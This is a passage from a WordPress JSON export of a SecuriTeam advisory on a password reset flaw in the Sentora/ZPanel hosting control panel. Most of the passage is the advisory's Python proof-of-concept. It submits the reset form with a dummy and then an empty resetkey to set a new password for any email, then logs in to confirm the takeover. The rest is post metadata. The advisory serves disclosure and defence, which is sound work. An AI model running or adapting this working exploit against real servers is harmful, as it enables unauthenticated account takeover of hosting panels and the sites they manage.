class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\"
id=\"crayon-59c82f65ac99b844907907-38\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">element <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#039;.\/\/input&#039;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">value <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span>
<span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">value <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-45\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">post_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span
class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-49\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-50\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-51\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-52\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Get reset form&quot;<\/span>
<span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-53\"><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;\/&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;frmZConfirm&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&quot;resetkey&quot;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;dummy&quot;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-55\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Reset password&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-56\"><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">form<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-57\"><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&quot;inConfEmail&quot;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-e\">USER_EMAIL<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-58\"><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&quot;inNewPass&quot;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&quot;inputNewPass2&quot;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">USER_NEWPASS<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-59\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">post_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&quot;resetkey&quot;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;&quot;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-61\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">USER_NAME<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span
class=\"crayon-p\">#session.cookies.clear()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Test login&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Get login form&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;\/&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;frmZLogin&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-66\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Login&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">form<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-69\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&quot;inUsername&quot;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">USER_NAME<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-70\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&quot;inPassword&quot;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">USER_NEWPASS<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-71\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">post_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;invalidlogin&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;location&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Failed!&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;OK&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\/?logout&quot;<\/span><span class=\"crayon-sy\">)<\/span><span
class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3386\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 24 Sep 2017 07:58:32 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a password reset found in Sentora \/ ZPanel. Sentora is &#8220;a free to download and use web hosting control panel developed for Linux, UNIX and BSD based servers or computers.
The Sentora software can turn a domestic or commercial server into a fully fledged, easy to use and manage &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3386\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Sentora \/ ZPanel Password Reset Vulnerability<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757,12136],"class_list":["post-9485","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9485","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9485"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9485\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9485"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9485"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9485"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}